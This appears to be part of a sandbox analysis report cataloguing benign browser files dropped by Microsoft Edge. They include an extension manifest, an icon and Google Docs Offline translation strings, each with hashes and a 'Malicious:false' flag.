                                                                                                                                                                                                                                                                                                                    SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                                    SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                                    SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):11185
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                    MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                    SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                    SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                    SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):4982
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                                    MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                                    SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                                    SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                                    SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):908
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                                    MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                                    SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                                    SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                                    SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1285
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                                    MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                                    SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                                    SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                                    SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1244
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                                    MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                                    SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                                    SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                                    SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):977
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                                    MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                                    SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                                    SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                                    SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):3107
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                                    MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                                    SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                                    SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                                    SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1389
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                                    MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                                    SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                                    SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                                    SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1763
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                                    MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                                    SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                                    SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                                    SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):930
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                                                    MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                                                    SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                                                    SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                                                    SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):913
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                                                    MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                                                    SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                                                    SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                                                    SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):806
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                                    MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                                    SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                                    SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                                    SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):883
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                                    MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                                    SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                                    SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                                    SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1031
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                                    MD5:D116453277CC860D196887CEC6432FFE
